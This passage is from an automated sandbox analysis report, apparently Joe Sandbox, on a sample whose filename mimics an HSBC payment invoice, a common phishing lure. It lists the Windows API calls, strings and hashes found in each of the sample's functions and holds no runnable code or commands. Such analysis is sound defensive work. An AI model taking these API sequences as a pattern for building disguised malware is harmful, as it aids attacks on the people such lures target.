                    • Instruction ID: 95bf0a261b782b1bac333b0da54dfe98d945f66b9894dbc2fbe45708a2623c1a
                    • Opcode Fuzzy Hash: cf47acd65c46415072a79650a89a69e499f0b0fbbb885affd3ef324257e896e4
                    • Instruction Fuzzy Hash: D3317031505219BBDF21AF64DC08FDA3BA9FF09761F114224FA15A60E0C735E825FBA4
                    APIs
                    • _memset.LIBCMT ref: 00EA707B
                      • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                    • __gmtime64_s.LIBCMT ref: 00EA7114
                    • __gmtime64_s.LIBCMT ref: 00EA714A
                    • __gmtime64_s.LIBCMT ref: 00EA7167
                    • __allrem.LIBCMT ref: 00EA71BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA71D9
                    • __allrem.LIBCMT ref: 00EA71F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA720E
                    • __allrem.LIBCMT ref: 00EA7225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA7243
                    • __invoke_watson.LIBCMT ref: 00EA72B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: f0fcc78370526dcf3584963edbf503dfc98c2431918715f7d84a270982b40a75
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: 6671CAB1A04716ABD714DE79CC8179BB7E8AF1A324F14523AF554FA281E770F9408790
                    APIs
                    • _memset.LIBCMT ref: 00EE2A31
                    • GetMenuItemInfoW.USER32(00F46890,000000FF,00000000,00000030), ref: 00EE2A92
                    • SetMenuItemInfoW.USER32(00F46890,00000004,00000000,00000030), ref: 00EE2AC8
                    • Sleep.KERNEL32(000001F4), ref: 00EE2ADA
                    • GetMenuItemCount.USER32(?), ref: 00EE2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 00EE2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 00EE2B64
                    • GetMenuItemID.USER32(?,?), ref: 00EE2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EE2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 323bff6defbabce34f2ef3312d4ca9225aaef01dfd2a3de18418741f9fe26aa1
                    • Instruction ID: 16fc07d01070a59204a394e26ed519f3f1540654067ea62d332f4514b4048760
                    • Opcode Fuzzy Hash: 323bff6defbabce34f2ef3312d4ca9225aaef01dfd2a3de18418741f9fe26aa1
                    • Instruction Fuzzy Hash: A5617CB090028DAFDB21CF65CC88ABEBBBCFB41308F14556DEA41A7251D771AD45EB21
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F07214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F07217
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F0723B
                    • _memset.LIBCMT ref: 00F0724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F0725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F072D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 1462a9553875f48afb76b234c88f52c247f96f1677b326778094096736f2b9ee
                    • Instruction ID: aeb64efceb8cf3a9e8579c982b9e5f0c12d3171a9fec153b459a3db09756f1a5
                    • Opcode Fuzzy Hash: 1462a9553875f48afb76b234c88f52c247f96f1677b326778094096736f2b9ee
                    • Instruction Fuzzy Hash: 0C613975900308AFDB20EFA4CC81EEE77F8AB09714F144199FA15E72E1D774A945EB60
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00ED7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00ED718E
                    • VariantInit.OLEAUT32(?), ref: 00ED71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00ED71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 00ED7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00ED7227
                    • VariantClear.OLEAUT32(?), ref: 00ED723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00ED7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ED7252
                    • VariantClear.OLEAUT32(?), ref: 00ED7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ED726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: 45290da3dae0fd8dbbf932717d8d9457ff8bd360a0e4543f8fb5e19dce8bc56e
                    • Instruction ID: 5b94f6944a0e2c81bdf778cca14ad79ce52db088b75ef12a964bca18d34103fd
                    • Opcode Fuzzy Hash: 45290da3dae0fd8dbbf932717d8d9457ff8bd360a0e4543f8fb5e19dce8bc56e
                    • Instruction Fuzzy Hash: 5F415075904219AFCF14DFA4DC849AEBBB8FF08354F00906AF955E7761DB30A946CB90
                    APIs
                    • WSAStartup.WS2_32(00000101,?), ref: 00EF5AA6
                    • inet_addr.WS2_32(?), ref: 00EF5AEB
                    • gethostbyname.WS2_32(?), ref: 00EF5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 00EF5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EF5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EF5C00
                    • WSACleanup.WS2_32 ref: 00EF5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 781e66688c48ac39ef653b40c9abccf713361dd2cf0b2cd980ed6f8abf3fb375
                    • Instruction ID: 1f88d0aa32f56145398357eb9838f7bc15d65a15214b2298d622238e7439387c
                    • Opcode Fuzzy Hash: 781e66688c48ac39ef653b40c9abccf713361dd2cf0b2cd980ed6f8abf3fb375
                    • Instruction Fuzzy Hash: 365181326047049FDB20AF24CC49B7AB7E4EF58714F149969F65AFB2A1DB70E804DB42
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EEB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EEB7B1
                    • GetLastError.KERNEL32 ref: 00EEB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00EEB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 316932d2a04b5d1252692caf6f12b3545f4dd60d74692656f2cd5f58344706d2
                    • Instruction ID: 4ef3e7b4988b4627ba7c8799bd39876a346974160d30d815ed7e53b4373b9600
                    • Opcode Fuzzy Hash: 316932d2a04b5d1252692caf6f12b3545f4dd60d74692656f2cd5f58344706d2
                    • Instruction Fuzzy Hash: E431C035A0024C9FDB10EFA6C885ABFB7B4FF48714F14512AE405E7291DB71D942DB41
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00ED94F6
                    • GetDlgCtrlID.USER32 ref: 00ED9501
                    • GetParent.USER32 ref: 00ED951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ED9520
                    • GetDlgCtrlID.USER32(?), ref: 00ED9529
                    • GetParent.USER32(?), ref: 00ED9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ED9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 61ef0bb380928030f1946658aaef31ae5fddcbb882dd653d3d8fcb909b5db24f
                    • Instruction ID: aaf28d3aa9866752c8f30eec28120043788f5c9a19a19a26ae1b793d504be227
                    • Opcode Fuzzy Hash: 61ef0bb380928030f1946658aaef31ae5fddcbb882dd653d3d8fcb909b5db24f
                    • Instruction Fuzzy Hash: B621C474A00108BBCF15AF64CCC5DFEBBB4FF45310F101266B565A72A2DB75991ADB20
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00ED95DF
                    • GetDlgCtrlID.USER32 ref: 00ED95EA
                    • GetParent.USER32 ref: 00ED9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00ED9609
                    • GetDlgCtrlID.USER32(?), ref: 00ED9612
                    • GetParent.USER32(?), ref: 00ED962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00ED9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: f22e1ae794d0a30920232adf77b2d91bc1937992b8869f0644869f92a16e0a4a
                    • Instruction ID: c5278392cc6f774ff478532acb6ddd642a22bde74be7b5aa1d5d056adfb92c30
                    • Opcode Fuzzy Hash: f22e1ae794d0a30920232adf77b2d91bc1937992b8869f0644869f92a16e0a4a
                    • Instruction Fuzzy Hash: 8421F874A00108BBDF14AB60CCC5EFEBBB4FF44300F141156F561A72A2DB76955ADB20
                    APIs
                    • GetParent.USER32 ref: 00ED9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00ED9666
                    • _wcscmp.LIBCMT ref: 00ED9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00ED96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: 9800c017fdf03b7605f3b8352ec34dfdc6c4872e92df2214b9d5c56855de3326
                    • Instruction ID: 7562a13592ebfbef5320c4dcc68d31da4c76f9d9a3a5e6066a37505703795f2d
                    • Opcode Fuzzy Hash: 9800c017fdf03b7605f3b8352ec34dfdc6c4872e92df2214b9d5c56855de3326
                    • Instruction Fuzzy Hash: BC112336248307BAEA112630DC06DA6B7DCDB15334F201127F910B91E2FEE2E9426A59
                    APIs
                    • __swprintf.LIBCMT ref: 00EE419D
                    • __swprintf.LIBCMT ref: 00EE41AA
                      • Part of subcall function 00EA38D8: __woutput_l.LIBCMT ref: 00EA3931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EE41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 00EE41E0
                    • LockResource.KERNEL32(00000000), ref: 00EE41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00EE420D
                    • LoadResource.KERNEL32(?,00000000), ref: 00EE421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 00EE422E
                    • LockResource.KERNEL32(?), ref: 00EE423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EE429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 4bb66aa96bf8c14aeb5e8febeb5e3c5d2d4de6d1d9c1f7ed350c2bdb6a995ff6
                    • Instruction ID: 988c4e552b307879c6b8a7d4bb46889d1d24a84a4f8f3223722391db45922dd2
                    • Opcode Fuzzy Hash: 4bb66aa96bf8c14aeb5e8febeb5e3c5d2d4de6d1d9c1f7ed350c2bdb6a995ff6
                    • Instruction Fuzzy Hash: 1531B0B5A0525EABCB119FA1DD48EBF7BACFF09301F044565F901E61A0D730DA51ABA0
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00EE1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 00EE171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EE0778,?,00000001), ref: 00EE17CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 1fbac4b00369a0db474fc7e9d5acf5f26c942a95b3b6b33da202b9a2f782905c
                    • Instruction ID: dc41ce19bd3f6a03feea2fa88934285415ba002dc09a4b1ff97ec1709abd003b
                    • Opcode Fuzzy Hash: 1fbac4b00369a0db474fc7e9d5acf5f26c942a95b3b6b33da202b9a2f782905c
                    • Instruction Fuzzy Hash: 9431B47560034CBBDB21EF15DC84B6937A9AB1BB65F104056FC00E62A0D770AD889F90
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E8FC06
                    • OleUninitialize.OLE32(?,00000000), ref: 00E8FCA5
                    • UnregisterHotKey.USER32(?), ref: 00E8FDFC
                    • DestroyWindow.USER32(?), ref: 00EC4A00
                    • FreeLibrary.KERNEL32(?), ref: 00EC4A65
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EC4A92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: e63f6ff2ca23665726f2ed48a88540db44bfaa47d007fa87f76fa6be8f5d989c
                    • Instruction ID: a663c923887863b20051d080a4230a03e00b7d0aab834883261afac0b3d1669d
                    • Opcode Fuzzy Hash: e63f6ff2ca23665726f2ed48a88540db44bfaa47d007fa87f76fa6be8f5d989c
                    • Instruction Fuzzy Hash: 5BA158717012128FCB29EF14C5A5F69F7A4AF04704F1462ADE90EBB2A2DB31AD16CF54
                    APIs
                    • EnumChildWindows.USER32(?,00EDAA64), ref: 00EDA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: 1236229f8af2195542c1982000d50acb567282090462a2e9ba1433f7e505523f
                    • Instruction ID: bdd5cfad724fd4c98f5f6a8c8d5a2389e5d2853583e1b8e56c4694b55134e366
                    • Opcode Fuzzy Hash: 1236229f8af2195542c1982000d50acb567282090462a2e9ba1433f7e505523f
                    • Instruction Fuzzy Hash: 9291C671900606DBCB08DF60C491BE9FBB5FF44314F18A12AE899B7241DF70AB5ADB91
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00E82EAE
                      • Part of subcall function 00E81DB3: GetClientRect.USER32(?,?), ref: 00E81DDC
                      • Part of subcall function 00E81DB3: GetWindowRect.USER32(?,?), ref: 00E81E1D
                      • Part of subcall function 00E81DB3: ScreenToClient.USER32(?,?), ref: 00E81E45
                    • GetDC.USER32 ref: 00EBCF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EBCF95
                    • SelectObject.GDI32(00000000,00000000), ref: 00EBCFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 00EBCFB8
                    • ReleaseDC.USER32(?,00000000), ref: 00EBCFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EBD04B
                    Strings
                    Memory Dump Source
